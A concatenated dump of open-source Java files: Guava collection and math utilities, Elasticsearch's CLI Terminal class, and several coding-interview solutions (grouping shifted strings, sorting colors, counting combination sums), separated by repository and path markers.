* @deprecated Use {@link Stats#meanOf} instead, noting the less strict handling of non-finite
* values.
*/
@Deprecated
// com.google.common.math.DoubleUtils
@GwtIncompatible
public static double mean(Iterator<? extends Number> values) {
checkArgument(values.hasNext(), "Cannot take mean of 0 values");
long count = 1;
double mean = checkFinite(values.next().doubleValue());
while (values.hasNext()) {
double value = checkFinite(values.next().doubleValue());
count++;
// Art of Computer Programming vol. 2, Knuth, 4.2.2, (15)
mean += (value - mean) / count;
}
return mean;
}
@GwtIncompatible // com.google.common.math.DoubleUtils
@CanIgnoreReturnValue
private static double checkFinite(double argument) {
checkArgument(isFinite(argument));
return argument;
}
private DoubleMath() {}
}
| google/guava | guava/src/com/google/common/math/DoubleMath.java |
1,185 | /*
* Copyright (C) 2008 The Guava Authors
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.google.common.collect;
import com.google.common.annotations.GwtCompatible;
import com.google.common.annotations.J2ktIncompatible;
import java.util.Arrays;
import java.util.Map;
import java.util.Set;
import java.util.concurrent.ConcurrentHashMap;
import org.checkerframework.checker.nullness.qual.Nullable;
/**
* Methods factored out so that they can be emulated differently in GWT.
*
* @author Hayward Chan
*/
@GwtCompatible(emulated = true)
@ElementTypesAreNonnullByDefault
final class Platform {
/** Returns the platform preferred implementation of a map based on a hash table. */
static <K extends @Nullable Object, V extends @Nullable Object>
Map<K, V> newHashMapWithExpectedSize(int expectedSize) {
return Maps.newHashMapWithExpectedSize(expectedSize);
}
/**
* Returns the platform preferred implementation of an insertion ordered map based on a hash
* table.
*/
static <K extends @Nullable Object, V extends @Nullable Object>
Map<K, V> newLinkedHashMapWithExpectedSize(int expectedSize) {
return Maps.newLinkedHashMapWithExpectedSize(expectedSize);
}
/** Returns the platform preferred implementation of a set based on a hash table. */
static <E extends @Nullable Object> Set<E> newHashSetWithExpectedSize(int expectedSize) {
return Sets.newHashSetWithExpectedSize(expectedSize);
}
/** Returns the platform preferred implementation of a thread-safe hash set. */
static <E> Set<E> newConcurrentHashSet() {
return ConcurrentHashMap.newKeySet();
}
/**
* Returns the platform preferred implementation of an insertion ordered set based on a hash
* table.
*/
static <E extends @Nullable Object> Set<E> newLinkedHashSetWithExpectedSize(int expectedSize) {
return Sets.newLinkedHashSetWithExpectedSize(expectedSize);
}
/**
* Returns the platform preferred map implementation that preserves insertion order when used only
* for insertions.
*/
static <K extends @Nullable Object, V extends @Nullable Object>
Map<K, V> preservesInsertionOrderOnPutsMap() {
return Maps.newLinkedHashMap();
}
/**
* Returns the platform preferred set implementation that preserves insertion order when used only
* for insertions.
*/
static <E extends @Nullable Object> Set<E> preservesInsertionOrderOnAddsSet() {
return CompactHashSet.create();
}
/**
* Returns a new array of the given length with the same type as a reference array.
*
* @param reference any array of the desired type
* @param length the length of the new array
*/
/*
* The new array contains nulls, even if the old array did not. If we wanted to be accurate, we
* would declare a return type of `@Nullable T[]`. However, we've decided not to think too hard
* about arrays for now, as they're a mess. (We previously discussed this in the review of
* ObjectArrays, which is the main caller of this method.)
*/
static <T extends @Nullable Object> T[] newArray(T[] reference, int length) {
T[] empty = reference.length == 0 ? reference : Arrays.copyOf(reference, 0);
return Arrays.copyOf(empty, length);
}
/** Equivalent to Arrays.copyOfRange(source, from, to, arrayOfType.getClass()). */
/*
* Arrays are a mess from a nullness perspective, and Class instances for object-array types are
* even worse. For now, we just suppress and move on with our lives.
*
* - https://github.com/jspecify/jspecify/issues/65
*
* - https://github.com/jspecify/jdk/commit/71d826792b8c7ef95d492c50a274deab938f2552
*/
/*
* TODO(cpovirk): Is the unchecked cast avoidable? Would System.arraycopy be similarly fast (if
* likewise not type-checked)? Could our single caller do something different?
*/
@SuppressWarnings({"nullness", "unchecked"})
static <T extends @Nullable Object> T[] copy(Object[] source, int from, int to, T[] arrayOfType) {
return Arrays.copyOfRange(source, from, to, (Class<? extends T[]>) arrayOfType.getClass());
}
/**
* Configures the given map maker to use weak keys, if possible; does nothing otherwise (i.e., in
* GWT). This is sometimes acceptable, when only server-side code could generate enough volume
* that reclamation becomes important.
*/
@J2ktIncompatible
static MapMaker tryWeakKeys(MapMaker mapMaker) {
return mapMaker.weakKeys();
}
static <E extends Enum<E>> Class<E> getDeclaringClassOrObjectForJ2cl(E e) {
return e.getDeclaringClass();
}
static int reduceIterationsIfGwt(int iterations) {
return iterations;
}
static int reduceExponentIfGwt(int exponent) {
return exponent;
}
private Platform() {}
}
| google/guava | guava/src/com/google/common/collect/Platform.java |
1,186 | // Given a string, we can "shift" each of its letter to its successive letter, for example: "abc" -> "bcd". We can keep "shifting" which forms the sequence:
// "abc" -> "bcd" -> ... -> "xyz"
// Given a list of strings which contains only lowercase alphabets, group all strings that belong to the same shifting sequence.
// For example, given: ["abc", "bcd", "acef", "xyz", "az", "ba", "a", "z"],
// A solution is:
// [
// ["abc","bcd","xyz"],
// ["az","ba"],
// ["acef"],
// ["a","z"]
// ]
import java.util.ArrayList;
import java.util.Collections;
import java.util.HashMap;
import java.util.List;
public class GroupShiftedStrings {
public List<List<String>> groupStrings(String[] strings) {
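        // Key idea: shift every string so that its first character becomes 'a' (wrapping characters that
        // fall below 'a' back up by 26); strings in the same shifting sequence then share the same key.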
List<List<String>> result = new ArrayList<List<String>>();
HashMap<String, List<String>> map = new HashMap<String, List<String>>();
for(String s : strings) {
int offset = s.charAt(0) - 'a';
String key = "";
for(int i = 0; i < s.length(); i++) {
char current = (char)(s.charAt(i) - offset);
if(current < 'a') {
current += 26;
}
key += current;
}
if(!map.containsKey(key)) {
List<String> list = new ArrayList<String>();
map.put(key, list);
}
map.get(key).add(s);
}
for(String key : map.keySet()) {
List<String> list = map.get(key);
Collections.sort(list);
result.add(list);
}
return result;
}
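    // A minimal usage sketch (not part of the original solution): runs the example
    // from the problem statement above and prints the grouped shifting sequences.
    public static void main(String[] args) {
        String[] input = {"abc", "bcd", "acef", "xyz", "az", "ba", "a", "z"};
        // Expected groups (in any order): [abc, bcd, xyz], [az, ba], [acef], [a, z]
        System.out.println(new GroupShiftedStrings().groupStrings(input));
    }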
}
| kdn251/interviews | company/uber/GroupShiftedStrings.java |
1,187 | // Given an array with n objects colored red, white or blue, sort them so that objects of the same color are adjacent, with the colors in the order red, white and blue.
// Here, we will use the integers 0, 1, and 2 to represent the color red, white, and blue respectively.
// Note:
// You are not supposed to use the library's sort function for this problem.
public class SortColors {
public void sortColors(int[] nums) {
        // Two-pass partition: the first pass moves every 0 (red) before the wall,
        // the second pass moves every 1 (white) next, leaving the 2s (blue) at the end.
        int wall = 0;
for(int i = 0; i < nums.length; i++) {
if(nums[i] < 1) {
int temp = nums[i];
nums[i] = nums[wall];
nums[wall] = temp;
wall++;
}
}
for(int i = 0; i < nums.length; i++) {
if(nums[i] == 1) {
int temp = nums[i];
nums[i] = nums[wall];
nums[wall] = temp;
wall++;
}
}
}
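    // A minimal usage sketch (not part of the original solution): sorts a sample
    // array in place; expected output is [0, 0, 1, 1, 2, 2].
    public static void main(String[] args) {
        int[] colors = {2, 0, 2, 1, 1, 0};
        new SortColors().sortColors(colors);
        System.out.println(java.util.Arrays.toString(colors));
    }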
}
| kdn251/interviews | leetcode/two-pointers/SortColors.java |
1,188 | // Given an integer array with all positive numbers and no duplicates, find the number of possible combinations that add up to a positive integer target.
// Example:
// nums = [1, 2, 3]
// target = 4
// The possible combination ways are:
// (1, 1, 1, 1)
// (1, 1, 2)
// (1, 2, 1)
// (1, 3)
// (2, 1, 1)
// (2, 2)
// (3, 1)
// Note that different sequences are counted as different combinations.
// Therefore the output is 7.
// Follow up:
// What if negative numbers are allowed in the given array?
// How does it change the problem?
// What limitation do we need to add to the question to allow negative numbers?
public class CombinationSumIV {
public int combinationSum4(int[] nums, int target) {
        // dp[i] = number of ordered combinations of nums that sum to i;
        // the empty combination is the single way to make 0.
        int[] dp = new int[target + 1];
dp[0] = 1;
for(int i = 1; i < dp.length; i++) {
for(int j = 0; j < nums.length; j++) {
if(i - nums[j] >= 0) {
dp[i] += dp[i - nums[j]];
}
}
}
return dp[target];
}
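    // A minimal usage sketch (not part of the original solution): runs the example
    // from the problem statement above; expected output is 7.
    public static void main(String[] args) {
        System.out.println(new CombinationSumIV().combinationSum4(new int[]{1, 2, 3}, 4));
    }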
}
| kdn251/interviews | company/facebook/CombinationSumIV.java |
1,189 | /*
* Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
* or more contributor license agreements. Licensed under the Elastic License
* 2.0 and the Server Side Public License, v 1; you may not use this file except
* in compliance with, at your election, the Elastic License 2.0 or the Server
* Side Public License, v 1.
*/
package org.elasticsearch.cli;
import org.elasticsearch.core.Nullable;
import org.elasticsearch.core.SuppressForbidden;
import java.io.Console;
import java.io.IOException;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.io.OutputStream;
import java.io.PrintWriter;
import java.io.Reader;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import java.nio.charset.Charset;
import java.util.Arrays;
import java.util.Locale;
/**
* A Terminal wraps access to reading input and writing output for a cli.
*
* The available methods are similar to those of {@link Console}, with the ability
* to read either normal text or a password, and the ability to print a line
* of text. Printing is also gated by the {@link Verbosity} of the terminal,
* which allows {@link #println(Verbosity,CharSequence)} calls which act like a logger,
* only actually printing if the verbosity level of the terminal is above
* the verbosity of the message.
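 *
 * <p>A minimal usage sketch (illustrative only, not part of the original documentation):
 * <pre>{@code
 * Terminal terminal = Terminal.DEFAULT;
 * terminal.setVerbosity(Terminal.Verbosity.VERBOSE);
 * terminal.println(Terminal.Verbosity.VERBOSE, "only shown when verbose");
 * char[] secret = terminal.readSecret("password: ");
 * boolean proceed = terminal.promptYesNo("Continue?", true);
 * }</pre>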
*/
public abstract class Terminal {
// Writer to standard error - not supplied by the {@link Console} API, so we share with subclasses
private static final PrintWriter ERROR_WRITER = newErrorWriter();
/** The default terminal implementation, which will be a console if available, or stdout/stderr if not. */
public static final Terminal DEFAULT = ConsoleTerminal.isSupported() ? new ConsoleTerminal() : new SystemTerminal();
@SuppressForbidden(reason = "Writer for System.err")
private static PrintWriter newErrorWriter() {
return new PrintWriter(System.err, true);
}
/** Defines the available verbosity levels of messages to be printed. */
public enum Verbosity {
SILENT, /* always printed */
NORMAL, /* printed when no options are given to cli */
VERBOSE /* printed only when cli is passed verbose option */
}
private final Reader reader;
private final PrintWriter outWriter;
private final PrintWriter errWriter;
private Verbosity currentVerbosity = Verbosity.NORMAL;
/**
* Constructs a terminal instance.
*
* @param reader A character-based reader over the input of this terminal
* @param outWriter A character-based writer for the output of this terminal
* @param errWriter A character-based writer for the error stream of this terminal
*/
protected Terminal(Reader reader, PrintWriter outWriter, PrintWriter errWriter) {
this.reader = reader;
this.outWriter = outWriter;
this.errWriter = errWriter;
}
/**
* Constructs a terminal instance from a delegate instance.
*/
protected Terminal(Terminal delegate) {
this(delegate.reader, delegate.outWriter, delegate.errWriter);
}
/**
* Sets the verbosity of the terminal.
*
* <p> Defaults to {@link Verbosity#NORMAL}.
*/
public void setVerbosity(Verbosity verbosity) {
this.currentVerbosity = verbosity;
}
/**
* Return the current verbosity level of this terminal.
*/
public Verbosity getVerbosity() {
return currentVerbosity;
}
private char[] read(String prompt) {
errWriter.print(prompt); // prompts should go to standard error to avoid mixing with list output
errWriter.flush(); // flush to ensure it is seen
final char[] line = readLineToCharArray(reader);
if (line == null) {
throw new IllegalStateException("unable to read from standard input; is standard input open and a tty attached?");
}
return line;
}
/** Reads clear text from the terminal input. See {@link Console#readLine()}. */
public String readText(String prompt) {
return new String(read(prompt));
}
    /** Reads password text from the terminal input. See {@link Console#readPassword()}. */
public char[] readSecret(String prompt) {
return read(prompt);
}
/** Returns a Reader which can be used to read directly from the terminal using standard input. */
public final Reader getReader() {
return reader;
}
/**
* Returns a line based OutputStream wrapping this Terminal's println.
* Note, this OutputStream is not thread-safe!
*/
public final OutputStream asLineOutputStream(Charset charset) {
return new LineOutputStream(charset);
}
/**
* Returns an InputStream which can be used to read from the terminal directly using standard input.
*
* <p> May return {@code null} if this Terminal is not capable of binary input.
* This corresponds with the underlying stream of bytes read by {@link #reader}.
*/
@Nullable
public InputStream getInputStream() {
return null;
}
/**
* Returns an OutputStream which can be used to write to the terminal directly using standard output.
*
* <p> May return {@code null} if this Terminal is not capable of binary output.
* This corresponds with the underlying stream of bytes written to by {@link #println(CharSequence)}.
*/
@Nullable
public OutputStream getOutputStream() {
return null;
}
/** Prints a line to the terminal at {@link Verbosity#NORMAL} verbosity level. */
public final void println(CharSequence msg) {
println(Verbosity.NORMAL, msg);
}
/** Prints a line to the terminal at {@code verbosity} level. */
public final void println(Verbosity verbosity, CharSequence msg) {
print(verbosity, outWriter, msg, true, true);
}
/** Prints message to the terminal's standard output at {@code verbosity} level, without a newline. */
public final void print(Verbosity verbosity, String msg) {
print(verbosity, outWriter, msg, false, true);
}
/**
* Prints message to the terminal at {@code verbosity} level.
*
* Subclasses may override if the writers are not implemented.
*/
protected void print(Verbosity verbosity, PrintWriter writer, CharSequence msg, boolean newline, boolean flush) {
if (isPrintable(verbosity)) {
if (newline) {
writer.println(msg);
} else {
writer.print(msg);
}
if (flush) {
writer.flush();
}
}
}
    /** Prints message to the terminal's standard error at {@code verbosity} level, without a newline. */
public final void errorPrint(Verbosity verbosity, String msg) {
print(verbosity, errWriter, msg, false, true);
}
/** Prints a line to the terminal's standard error at {@link Verbosity#NORMAL} verbosity level. */
public final void errorPrintln(String msg) {
print(Verbosity.NORMAL, errWriter, msg, true, true);
}
/** Prints a line to the terminal's standard error at {@code verbosity} level. */
public final void errorPrintln(Verbosity verbosity, String msg) {
print(verbosity, errWriter, msg, true, true);
}
/** Prints a line to the terminal's standard error at {@code verbosity} level, with an optional flush */
public final void errorPrintln(Verbosity verbosity, String msg, boolean flush) {
print(verbosity, errWriter, msg, true, flush);
}
/** Prints a stacktrace to the terminal's standard error at {@code verbosity} level. */
public void errorPrintln(Verbosity verbosity, Throwable throwable) {
if (isPrintable(verbosity)) {
throwable.printStackTrace(errWriter);
}
}
/** Prints a stacktrace to the terminal's standard error at {@link Verbosity#SILENT} verbosity level. */
public void errorPrintln(Throwable throwable) {
errorPrintln(Verbosity.SILENT, throwable);
}
    /** Checks whether messages at the given {@code verbosity} level should be printed, given this terminal's current verbosity. */
public final boolean isPrintable(Verbosity verbosity) {
return this.currentVerbosity.ordinal() >= verbosity.ordinal();
}
/**
* Prompt for a yes or no answer from the user. This method will loop until 'y' or 'n'
* (or the default empty value) is entered.
*/
public final boolean promptYesNo(String prompt, boolean defaultYes) {
String answerPrompt = defaultYes ? " [Y/n]" : " [y/N]";
while (true) {
String answer = readText(prompt + answerPrompt);
if (answer == null || answer.isEmpty()) {
return defaultYes;
}
answer = answer.toLowerCase(Locale.ROOT);
boolean answerYes = answer.equals("y");
if (answerYes == false && answer.equals("n") == false) {
errorPrintln("Did not understand answer '" + answer + "'");
continue;
}
return answerYes;
}
}
/**
* Read from the reader until we find a newline. If that newline
* character is immediately preceded by a carriage return, we have
* a Windows-style newline, so we discard the carriage return as well
* as the newline.
*/
public static char[] readLineToCharArray(Reader reader) {
char[] buf = new char[128];
try {
int len = 0;
int next;
while ((next = reader.read()) != -1) {
char nextChar = (char) next;
if (nextChar == '\n') {
break;
}
if (len >= buf.length) {
char[] newbuf = new char[buf.length * 2];
System.arraycopy(buf, 0, newbuf, 0, buf.length);
Arrays.fill(buf, '\0');
buf = newbuf;
}
buf[len++] = nextChar;
}
if (len == 0 && next == -1) {
return null;
}
if (len > 0 && len <= buf.length && buf[len - 1] == '\r') {
len--;
}
char[] shortResult = Arrays.copyOf(buf, len);
Arrays.fill(buf, '\0');
return shortResult;
} catch (IOException e) {
throw new RuntimeException(e);
}
}
/**
* Flush the outputs of this terminal.
*/
public final void flush() {
outWriter.flush();
errWriter.flush();
}
/**
     * Indicates whether this terminal is for a headless system, i.e. it is not interactive. If an instance answers
     * {@code false}, interactive operations can be attempted, but it is not guaranteed that they will succeed.
     *
     * @return whether this terminal is headless.
*/
public boolean isHeadless() {
return false;
}
private static class ConsoleTerminal extends Terminal {
private static final int JDK_VERSION_WITH_IS_TERMINAL = 22;
private static final Console CONSOLE = detectTerminal();
ConsoleTerminal() {
super(CONSOLE.reader(), CONSOLE.writer(), ERROR_WRITER);
}
static boolean isSupported() {
return CONSOLE != null;
}
static Console detectTerminal() {
// JDK >= 22 returns a console even if the terminal is redirected unless using -Djdk.console=java.base
// https://bugs.openjdk.org/browse/JDK-8308591
Console console = System.console();
if (console != null && Runtime.version().feature() >= JDK_VERSION_WITH_IS_TERMINAL) {
try {
// verify the console is a terminal using isTerminal() on JDK >= 22
// TODO: Remove reflection once Java 22 sources are supported, e.g. using a MRJAR
Method isTerminal = Console.class.getMethod("isTerminal");
return Boolean.TRUE.equals(isTerminal.invoke(console)) ? console : null;
} catch (NoSuchMethodException | IllegalAccessException | InvocationTargetException e) {
throw new AssertionError(e);
}
}
return console;
}
@Override
public String readText(String prompt) {
return CONSOLE.readLine("%s", prompt);
}
@Override
public char[] readSecret(String prompt) {
return CONSOLE.readPassword("%s", prompt);
}
}
/** visible for testing */
@SuppressForbidden(reason = "Access streams for construction")
static class SystemTerminal extends Terminal {
SystemTerminal() {
super(
// TODO: InputStreamReader can advance stdin past what it decodes. We need a way to buffer this and put it back
// at the end of each character based read, so that switching to using getInputStream() returns binary data
// right after the last character based input (newline)
new InputStreamReader(System.in, Charset.defaultCharset()),
new PrintWriter(System.out, true),
ERROR_WRITER
);
}
@Override
public InputStream getInputStream() {
return System.in;
}
@Override
public OutputStream getOutputStream() {
return System.out;
}
}
/** A line based OutputStream wrapping this Terminal's println, not thread-safe! */
private class LineOutputStream extends OutputStream {
static final int DEFAULT_BUFFER_LENGTH = 1024;
static final int MAX_BUFFER_LENGTH = DEFAULT_BUFFER_LENGTH * 8;
private final Charset charset;
private byte[] bytes = new byte[DEFAULT_BUFFER_LENGTH];
private int count = 0;
LineOutputStream(Charset charset) {
this.charset = charset;
}
@Override
public void write(int b) {
if (b == 0) return;
if (b == '\n') {
flush(true);
return;
}
if (count == bytes.length) {
if (count >= MAX_BUFFER_LENGTH) {
flush(false);
} else {
bytes = Arrays.copyOf(bytes, 2 * bytes.length);
}
}
bytes[count++] = (byte) b;
}
private void flush(boolean newline) {
if (newline && count > 0 && bytes[count - 1] == '\r') {
--count; // drop CR on windows as well
}
String msg = count > 0 ? new String(bytes, 0, count, charset) : "";
print(Verbosity.NORMAL, outWriter, msg, newline, true);
count = 0;
if (bytes.length > DEFAULT_BUFFER_LENGTH) {
bytes = new byte[DEFAULT_BUFFER_LENGTH];
}
}
@Override
public void flush() {
if (count > 0) {
flush(false);
}
}
}
}
| elastic/elasticsearch | libs/cli/src/main/java/org/elasticsearch/cli/Terminal.java |
// Given a string, we can "shift" each of its letters to its successive letter, for example: "abc" -> "bcd". We can keep "shifting" which forms the sequence:
// "abc" -> "bcd" -> ... -> "xyz"
// Given a list of strings which contains only lowercase letters, group all strings that belong to the same shifting sequence.
// For example, given: ["abc", "bcd", "acef", "xyz", "az", "ba", "a", "z"],
// A solution is:
// [
// ["abc","bcd","xyz"],
// ["az","ba"],
// ["acef"],
// ["a","z"]
// ]
import java.util.ArrayList;
import java.util.Collections;
import java.util.HashMap;
import java.util.List;
public class GroupShiftedStrings {
public List<List<String>> groupStrings(String[] strings) {
List<List<String>> result = new ArrayList<List<String>>();
HashMap<String, List<String>> map = new HashMap<String, List<String>>();
for(String s : strings) {
int offset = s.charAt(0) - 'a';
String key = "";
for(int i = 0; i < s.length(); i++) {
char current = (char)(s.charAt(i) - offset);
if(current < 'a') {
current += 26;
}
key += current;
}
if(!map.containsKey(key)) {
List<String> list = new ArrayList<String>();
map.put(key, list);
}
map.get(key).add(s);
}
for(String key : map.keySet()) {
List<String> list = map.get(key);
Collections.sort(list);
result.add(list);
}
return result;
}
}
| kdn251/interviews | company/google/GroupShiftedStrings.java |
1,195 | /*
* Copyright (C) 2008 The Guava Authors
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.google.common.collect;
import static com.google.common.base.Preconditions.checkArgument;
import static com.google.common.base.Preconditions.checkNotNull;
import static java.util.Objects.requireNonNull;
import com.google.common.annotations.GwtCompatible;
import com.google.common.base.Supplier;
import java.io.Serializable;
import java.util.Comparator;
import java.util.Iterator;
import java.util.Map;
import java.util.NoSuchElementException;
import java.util.Set;
import java.util.SortedMap;
import java.util.SortedSet;
import java.util.TreeMap;
import javax.annotation.CheckForNull;
/**
* Implementation of {@code Table} whose row keys and column keys are ordered by their natural
* ordering or by supplied comparators. When constructing a {@code TreeBasedTable}, you may provide
* comparators for the row keys and the column keys, or you may use natural ordering for both.
*
* <p>The {@link #rowKeySet} method returns a {@link SortedSet} and the {@link #rowMap} method
* returns a {@link SortedMap}, instead of the {@link Set} and {@link Map} specified by the {@link
* Table} interface.
*
* <p>The views returned by {@link #column}, {@link #columnKeySet()}, and {@link #columnMap()} have
* iterators that don't support {@code remove()}. Otherwise, all optional operations are supported.
 * Null row keys, column keys, and values are not supported.
*
* <p>Lookups by row key are often faster than lookups by column key, because the data is stored in
* a {@code Map<R, Map<C, V>>}. A method call like {@code column(columnKey).get(rowKey)} still runs
* quickly, since the row key is provided. However, {@code column(columnKey).size()} takes longer,
* since an iteration across all row keys occurs.
*
* <p>Because a {@code TreeBasedTable} has unique sorted values for a given row, both {@code
* row(rowKey)} and {@code rowMap().get(rowKey)} are {@link SortedMap} instances, instead of the
* {@link Map} specified in the {@link Table} interface.
*
* <p>Note that this implementation is not synchronized. If multiple threads access this table
* concurrently and one of the threads modifies the table, it must be synchronized externally.
*
* <p>See the Guava User Guide article on <a href=
* "https://github.com/google/guava/wiki/NewCollectionTypesExplained#table">{@code Table}</a>.
*
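 * <p>A minimal usage sketch (illustrative only, not part of the original documentation):
 * <pre>{@code
 * TreeBasedTable<String, Integer, Double> table = TreeBasedTable.create();
 * table.put("rowB", 2, 2.0);
 * table.put("rowA", 1, 1.0);
 * // Row keys and column keys iterate in sorted order.
 * SortedSet<String> rows = table.rowKeySet();          // [rowA, rowB]
 * SortedMap<Integer, Double> rowA = table.row("rowA"); // {1=1.0}
 * }</pre>
 *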
* @author Jared Levy
* @author Louis Wasserman
* @since 7.0
*/
@GwtCompatible(serializable = true)
@ElementTypesAreNonnullByDefault
public class TreeBasedTable<R, C, V> extends StandardRowSortedTable<R, C, V> {
private final Comparator<? super C> columnComparator;
private static class Factory<C, V> implements Supplier<TreeMap<C, V>>, Serializable {
final Comparator<? super C> comparator;
Factory(Comparator<? super C> comparator) {
this.comparator = comparator;
}
@Override
public TreeMap<C, V> get() {
return new TreeMap<>(comparator);
}
private static final long serialVersionUID = 0;
}
/**
* Creates an empty {@code TreeBasedTable} that uses the natural orderings of both row and column
* keys.
*
* <p>The method signature specifies {@code R extends Comparable} with a raw {@link Comparable},
* instead of {@code R extends Comparable<? super R>}, and the same for {@code C}. That's
* necessary to support classes defined without generics.
*/
@SuppressWarnings("rawtypes") // https://github.com/google/guava/issues/989
public static <R extends Comparable, C extends Comparable, V> TreeBasedTable<R, C, V> create() {
return new TreeBasedTable<>(Ordering.natural(), Ordering.natural());
}
/**
* Creates an empty {@code TreeBasedTable} that is ordered by the specified comparators.
*
* @param rowComparator the comparator that orders the row keys
* @param columnComparator the comparator that orders the column keys
*/
public static <R, C, V> TreeBasedTable<R, C, V> create(
Comparator<? super R> rowComparator, Comparator<? super C> columnComparator) {
checkNotNull(rowComparator);
checkNotNull(columnComparator);
return new TreeBasedTable<>(rowComparator, columnComparator);
}
/**
* Creates a {@code TreeBasedTable} with the same mappings and sort order as the specified {@code
* TreeBasedTable}.
*/
public static <R, C, V> TreeBasedTable<R, C, V> create(TreeBasedTable<R, C, ? extends V> table) {
TreeBasedTable<R, C, V> result =
new TreeBasedTable<>(table.rowComparator(), table.columnComparator());
result.putAll(table);
return result;
}
TreeBasedTable(Comparator<? super R> rowComparator, Comparator<? super C> columnComparator) {
super(new TreeMap<R, Map<C, V>>(rowComparator), new Factory<C, V>(columnComparator));
this.columnComparator = columnComparator;
}
// TODO(jlevy): Move to StandardRowSortedTable?
/**
* Returns the comparator that orders the rows. With natural ordering, {@link Ordering#natural()}
* is returned.
*
* @deprecated Use {@code table.rowKeySet().comparator()} instead.
*/
@Deprecated
public Comparator<? super R> rowComparator() {
/*
* requireNonNull is safe because the factories require non-null Comparators, which they pass on
* to the backing collections.
*/
return requireNonNull(rowKeySet().comparator());
}
/**
* Returns the comparator that orders the columns. With natural ordering, {@link
* Ordering#natural()} is returned.
*
* @deprecated Store the {@link Comparator} alongside the {@link Table}. Or, if you know that the
* {@link Table} contains at least one value, you can retrieve the {@link Comparator} with:
* {@code ((SortedMap<C, V>) table.rowMap().values().iterator().next()).comparator();}.
*/
@Deprecated
public Comparator<? super C> columnComparator() {
return columnComparator;
}
// TODO(lowasser): make column return a SortedMap
/**
* {@inheritDoc}
*
* <p>Because a {@code TreeBasedTable} has unique sorted values for a given row, this method
* returns a {@link SortedMap}, instead of the {@link Map} specified in the {@link Table}
* interface.
*
* @since 10.0 (<a href="https://github.com/google/guava/wiki/Compatibility" >mostly
* source-compatible</a> since 7.0)
*/
@Override
public SortedMap<C, V> row(R rowKey) {
return new TreeRow(rowKey);
}
private class TreeRow extends Row implements SortedMap<C, V> {
@CheckForNull final C lowerBound;
@CheckForNull final C upperBound;
TreeRow(R rowKey) {
this(rowKey, null, null);
}
TreeRow(R rowKey, @CheckForNull C lowerBound, @CheckForNull C upperBound) {
super(rowKey);
this.lowerBound = lowerBound;
this.upperBound = upperBound;
checkArgument(
lowerBound == null || upperBound == null || compare(lowerBound, upperBound) <= 0);
}
@Override
public SortedSet<C> keySet() {
return new Maps.SortedKeySet<>(this);
}
@Override
public Comparator<? super C> comparator() {
return columnComparator();
}
int compare(Object a, Object b) {
// pretend we can compare anything
@SuppressWarnings("unchecked")
Comparator<Object> cmp = (Comparator<Object>) comparator();
return cmp.compare(a, b);
}
boolean rangeContains(@CheckForNull Object o) {
return o != null
&& (lowerBound == null || compare(lowerBound, o) <= 0)
&& (upperBound == null || compare(upperBound, o) > 0);
}
@Override
public SortedMap<C, V> subMap(C fromKey, C toKey) {
checkArgument(rangeContains(checkNotNull(fromKey)) && rangeContains(checkNotNull(toKey)));
return new TreeRow(rowKey, fromKey, toKey);
}
@Override
public SortedMap<C, V> headMap(C toKey) {
checkArgument(rangeContains(checkNotNull(toKey)));
return new TreeRow(rowKey, lowerBound, toKey);
}
@Override
public SortedMap<C, V> tailMap(C fromKey) {
checkArgument(rangeContains(checkNotNull(fromKey)));
return new TreeRow(rowKey, fromKey, upperBound);
}
@Override
public C firstKey() {
updateBackingRowMapField();
if (backingRowMap == null) {
throw new NoSuchElementException();
}
return ((SortedMap<C, V>) backingRowMap).firstKey();
}
@Override
public C lastKey() {
updateBackingRowMapField();
if (backingRowMap == null) {
throw new NoSuchElementException();
}
return ((SortedMap<C, V>) backingRowMap).lastKey();
}
@CheckForNull transient SortedMap<C, V> wholeRow;
// If the row was previously empty, we check if there's a new row here every time we're queried.
void updateWholeRowField() {
if (wholeRow == null || (wholeRow.isEmpty() && backingMap.containsKey(rowKey))) {
wholeRow = (SortedMap<C, V>) backingMap.get(rowKey);
}
}
@Override
@CheckForNull
SortedMap<C, V> computeBackingRowMap() {
updateWholeRowField();
SortedMap<C, V> map = wholeRow;
if (map != null) {
if (lowerBound != null) {
map = map.tailMap(lowerBound);
}
if (upperBound != null) {
map = map.headMap(upperBound);
}
return map;
}
return null;
}
@Override
void maintainEmptyInvariant() {
updateWholeRowField();
if (wholeRow != null && wholeRow.isEmpty()) {
backingMap.remove(rowKey);
wholeRow = null;
backingRowMap = null;
}
}
@Override
public boolean containsKey(@CheckForNull Object key) {
return rangeContains(key) && super.containsKey(key);
}
@Override
@CheckForNull
public V put(C key, V value) {
checkArgument(rangeContains(checkNotNull(key)));
return super.put(key, value);
}
}
// rowKeySet() and rowMap() are defined here so they appear in the Javadoc.
@Override
public SortedSet<R> rowKeySet() {
return super.rowKeySet();
}
@Override
public SortedMap<R, Map<C, V>> rowMap() {
return super.rowMap();
}
  /** Overridden column key iterator that returns column keys in globally sorted order. */
@Override
Iterator<C> createColumnKeyIterator() {
Comparator<? super C> comparator = columnComparator();
Iterator<C> merged =
Iterators.mergeSorted(
Iterables.transform(
backingMap.values(), (Map<C, V> input) -> input.keySet().iterator()),
comparator);
return new AbstractIterator<C>() {
@CheckForNull C lastValue;
@Override
@CheckForNull
protected C computeNext() {
while (merged.hasNext()) {
C next = merged.next();
boolean duplicate = lastValue != null && comparator.compare(next, lastValue) == 0;
// Keep looping till we find a non-duplicate value.
if (!duplicate) {
lastValue = next;
return lastValue;
}
}
lastValue = null; // clear reference to unused data
return endOfData();
}
};
}
private static final long serialVersionUID = 0;
}
| google/guava | guava/src/com/google/common/collect/TreeBasedTable.java |
//Given two lists A and B, where B is an anagram of A. B is an anagram of A means B is made by randomizing the order of the elements in A.
//We want to find an index mapping P, from A to B. A mapping P[i] = j means the ith element in A appears in B at index j.
